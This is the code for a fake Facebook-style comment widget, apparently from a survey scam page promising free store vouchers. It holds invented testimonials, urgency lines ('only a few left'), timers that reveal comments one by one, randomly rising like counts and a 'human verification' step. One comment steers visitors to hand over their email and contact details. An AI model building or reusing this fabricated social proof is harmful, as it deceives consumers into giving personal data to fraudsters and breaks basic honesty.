//comments css

.comment-area {
    overflow: hidden;
    position: relative;
    font-size: 14px !important;
    text-align: left;
    padding: 10px;
    font-family: 'Myriad Pro', sans-serif;
    margin: 20px auto;
}

.action {
    padding: 5px 0;
}

.action a {
    display: inline-block;
    padding-left: 20px;
    text-decoration: none;
    color: #6d6d6d;
    margin-right: 10px;
}

.action .like {
    background: url(../images/like.png) no-repeat left center;
}

.action .bubble {
    background: url(../images/bubble.png) no-repeat left center;
}

.action .share-btn {
    background: url(../images/share.png) no-repeat left center;
}

.action .active-like {
    background-image: url(../images/like-active.png);
    color: #5890ff;
}

.tot-likes > p {
    line-height: 20px;
    padding: 5px 0;
    color: #3f5199;
    border-bottom: 1px solid #e1e3e4;
}
.like-imgs {
    padding: 10px 0 5px;
    max-height: 47px;
    overflow: hidden;
}

.like-imgs > div {
    display: inline-block;
    margin-right: 5px;
    position: relative;
    margin-bottom: 5px;
}

.like-imgs > div img {
    display: block;
}

.like-imgs > div .reaction-img {
    position: absolute;
    bottom: -5px;
    right: -5px;
    z-index: 10;
}
.you {
    display: none;
}

.you.active {
    display: inline-block;
    line-height: 20px;
    padding-left: 20px;
    background: url(../images/btn.png) no-repeat left center;
}

.comment {
    position: relative;
    padding: 10px 0 10px 60px;
    min-height: 70px;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
}

.profile {
    position: absolute;
    top: 10px;
    left: 0;
}

.name {
    font-weight: 700;
    text-decoration: none;
    color: #3f5199;
}

.com-txt {
    margin-bottom: 10px;
    line-height: 1.3;
}

.act a {
    color: #3f5199;
    text-decoration: none;
}

.liked {
    background: url(../images/like-btn.png) no-repeat left center;
    padding-left: 16px;
    line-height: 16px;
    color: #3f5199;
}

.liked:after {
    content: ' · ';
}

.time {
    color: #8d9098;
}

.comment .comment {
    padding-left: 50px;
    padding-right: 0;
}

.comment .comment .profile {
    left: 0 !important;
    width: 40px !important;
    height: 40px !important;
}

.fbimg {
    max-width: 220px;
    width: 100%;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
    height: auto;
    display: block;
    padding: 3px;
    border: 1px solid #808080;
    border-radius: 2px;
    -moz-border-radius: 2px;
    -webkit-border-radius: 2px;
    margin-bottom: 10px;
}

.addComment {
    position: relative;
    padding: 10px 0 10px 60px;
    height: 70px;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
}

.addComment img {
    position: absolute;
    left: 0;
    top: 8px;
}

.addComment input {
    border-radius: 2px;
    -moz-border-radius: 2px;
    -webkit-border-radius: 2px;
    border: 1px solid #e0e0e0;
    line-height: 48px;
    width: 100%;
    display: block;
    outline: 0;
    padding: 0 50px 0 10px;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
    background: #fff url(../images/btnz.png) no-repeat right center;
}

.hide, .likehide, #myCom {
    display: none;
}

//comments css
//comments body
<div class="comment-area">
		<div class="action">
			<a class="like" href="javascript:void(0);">Like</a>
			<a class="bubble" href="javascript:void(0);">Comment</a>
			<a class="share-btn" href="javascript:void(0);">Share</a>
		</div>
		<div class="tot-likes">
			<div class="like-imgs">
				<div><img src="images/img8.jpg" width="32" height="32"><img class="reaction-img" src="images/btn.png" width="16" height="16"></div>
				<div><img src="images/img4.jpg" width="32" height="32"><img class="reaction-img" src="images/love.png" width="16" height="16"></div>
				<div><img src="images/img6.jpg" width="32" height="32"><img class="reaction-img" src="images/btn.png" width="16" height="16"></div>
				<div><img src="images/img7.jpg" width="32" height="32"><img class="reaction-img" src="images/btn.png" width="16" height="16"></div>
				<div><img src="images/img9.jpg" width="32" height="32"><img class="reaction-img" src="images/btn.png" width="16" height="16"></div>
				<div><img src="images/img10.jpg" width="32" height="32"><img class="reaction-img" src="images/btn.png" width="16" height="16"></div>
				<div><img src="images/img2.jpg" width="32" height="32"><img class="reaction-img" src="images/love.png" width="16" height="16"></div>
				<div><img src="images/img1.jpg" width="32" height="32"><img class="reaction-img" src="images/love.png" width="16" height="16"></div>
				<div><img src="images/img3.jpg" width="32" height="32"><img class="reaction-img" src="images/btn.png" width="16" height="16"></div>
				<div><img src="images/img5.jpg" width="32" height="32"><img class="reaction-img" src="images/love.png" width="16" height="16"></div>
			</div>
			<p><span class="you">You and</span> 35.059 others liked this.</p>
		</div>
		<div id="myCom" class="comment">
			<img class="profile" src="images/generic.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">USERNAME #559631</a>
			<span id="myComment"></span></p>
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> · 
				<span class="liked likehide"></span>
				<span class="time">Just Now</span>
			</div>
		</div>
		<div id="com1" class="comment hide">
			<img class="profile" src="images/img12.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">Nicole Causer</a>
			I’m not surprised you're giving away free vouchers your service is garbage.</p>
			
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> · 
				<span class="liked likehide"></span>
				<span class="time">Just Now</span>
			</div>
		</div>
		<div id="com2" class="comment hide">
			<img class="profile" src="images/img11.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">Elizabeth Harvey
</a>
			Lucky me just recived mine.</p>
			
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> · 
				<span class="liked likehide"></span>
				<span class="time">Just Now</span>
			</div>
		</div>
		<div id="com3" class="comment hide">
			<img class="profile" src="images/img6.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">Lauryn Sheehan Kenny</a>
			Was sure this was just another scam so went into the store and asked the staff and they said it's real but it'sonly for a limited time.</p>
			
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> · 
				<span class="liked likehide"></span>
				<span class="time">Just Now</span>
			</div>
		</div>
		<div id="com4" class="comment hide">
			<img class="profile" src="images/img6.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">Lauryn Sheehan Kenny</a>
			I hate XXXX but I’ll grab these free vouchers lol.</p>
			
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> · 
				<span class="liked likehide"></span>
				<span class="time">Just Now</span>
			</div>
		</div>
		<div id="com5" class="comment hide">
			<img class="profile" src="images/img5.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">Anne Hickey</a>
			Wow just received my voucher, looks like it’s going to be a good christmas.</p>
			
			<img src="images/c3.jpg" class="fbimg">
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> · 
				<span class="liked likehide"></span>
				<span class="time">Just Now</span>
			</div>
		</div>
		<div id="com6" class="comment hide">
			<img class="profile" src="images/img4.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">Annemarie Jenkins</a>
			Was sure this was not for real but guess I was wrong.</p>
			
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> · 
				<span class="liked likehide"></span>
				<span class="time">Just Now</span>
			</div>
		</div>
		<div id="com7" class="comment hide">
			<img class="profile" src="images/img3.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">Danny Bowen</a>
			Can anybody tell me what I need to do to get these vouchers, I really need it.</p>
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> ·
				<span class="liked likehide"></span>
				<span class="time">Just Now</span>
			</div>
		</div>
		<div id="com8" class="comment hide">
			<img class="profile" src="images/img2.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">Kitty Carty</a>
			Why anyone would want to shop at Safeway is beyond me.</p>
			
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> · 
				<span class="liked likehide"></span>
				<span class="time">Just Now</span>
			</div>
		</div>
		<div class="comment">
			<img class="profile" src="images/img1.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">Jennifer Bradford</a>
			I keep getting an error when ever I enter my zip code!?!?!</p>
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> · 
				<span class="liked">8</span>
				<span class="time">2 mins</span>
			</div>
		</div>
		<div class="comment">
			<img class="profile" src="images/img9.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">Thomas Pearson</a>
			They are only giving away 5000 so hurry people only a few left. I just received mine.</p>
			<img src="images/c2.jpg" class="fbimg">
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> · 
				<span class="liked">61</span>
				<span class="time">3 mins</span>
			</div>
		</div>
		<div class="comment">
			<img class="profile" src="images/img8.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">Russell Graham</a>
			Okay so for all of you asking what you need to do to get the voucher it’s pretty simple take the survey honestly and after thats complete you’ll be redirected to a form where you need to enter your email and contact details. It took about 4 days for me to receive my voucher but it came.</p><img src="images/c1.jpg" class="fbimg">
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> · 
				<span class="liked">11</span>
				<span class="time">4 mins</span>
			</div>
		</div>
		<div class="comment">
			<img class="profile" src="images/img7.jpg" width="50" height="50">
			<p class="com-txt"><a class="name" href="javascript:void(0);">Frank Beyer</a>
			Help, what do I need to do exactly to get one of these vouchers?</p>
			
			<div class="act">
				<a class="fblike" href="javascript:void(0);">Like</a> · 
				<a href="javascript:void(0);">Reply</a> · 
				<span class="liked">2</span>
				<span class="time">6 mins</span>
			</div>
		</div>
		<div class="addComment">
			<img src="images/generic.jpg" width="50" height="50">
			<input type="text" id="addCom" placeholder="Write a comment...">
		</div>
	</div>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script type="text/javascript">
function getRandomInt (min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}
function loadCom(a,b) {
	setTimeout(function() {
		$(a).fadeIn(250);
	}, b);
}
$.fn.onEnterKey = function(callback) {
    $(this).keypress(function(event) {
        var code = event.keyCode ? event.keyCode : event.which;
        if (code == 13) {
            callback();
            return false;
        }
    });
}
$(document).ready(function() {

	loadCom('#com8', 2500);
	loadCom('#com7', 5200);
	loadCom('#com6', 8850);
	loadCom('#com5', 12600);
	loadCom('#com4', 15950);
	loadCom('#com3', 19850);
	loadCom('#com2', 24650);
	loadCom('#com1', 28300);

	$(document).on('click', '#load-section', function() {
		$(".first-section").fadeOut(500, function() {
			$(".loading-section").fadeIn(500, function() {
				setTimeout(function() {
					$(".loading-section").fadeOut(500, function() {
						$(".gz").html("HUMAN VERIFICATION")
						$(".verification-section").fadeIn(500);
					});
				}, 4000);
			});
		});
	});

	$('.like').on('click',function() {
		var _this = $(this);
		if(_this.hasClass('active-like')) {
			_this.removeClass('active-like');
			$('.you').removeClass('active');
		} else {
			_this.addClass('active-like');
			$('.you').addClass('active');
		}
	});
	$(document).on('click', '.fblike', function() {
		var _this = $(this);
		var x = _this.next().next().html() == '' ? 0 : parseInt(_this.next().next().html());
		if(_this.hasClass('selected')) {
			_this.removeClass('selected').html('Like');
			_this.next().next().html(--x);
			if(x == 0) _this.next().next().addClass('likehide');
		} else {
			_this.addClass('selected').html('Unlike');
			_this.next().next().html(++x);
			if(_this.next().next().hasClass('likehide')) _this.next().next().removeClass('likehide');
		}
	});
	$("#addCom").onEnterKey(function() {
		var value = $("#addCom").val();
		$("#addCom").val("");
		$("#myComment").html(value);
		$(".addComment").hide();
		loadCom('#myCom', 250);
	});
	(function increment() {
		setTimeout(function() {
			var elem = $(".comment:visible").length;
			$(".comment:visible").each(function(i) {
				if(i == getRandomInt(0,elem)) {
					var value = $(this).find(".liked").html();
					value = parseInt(++value);
					$(this).find(".liked").removeClass("likehide").html(value);
				}
			});
			increment();
		}, getRandomInt(500, 2200));
	})();

});
</script>

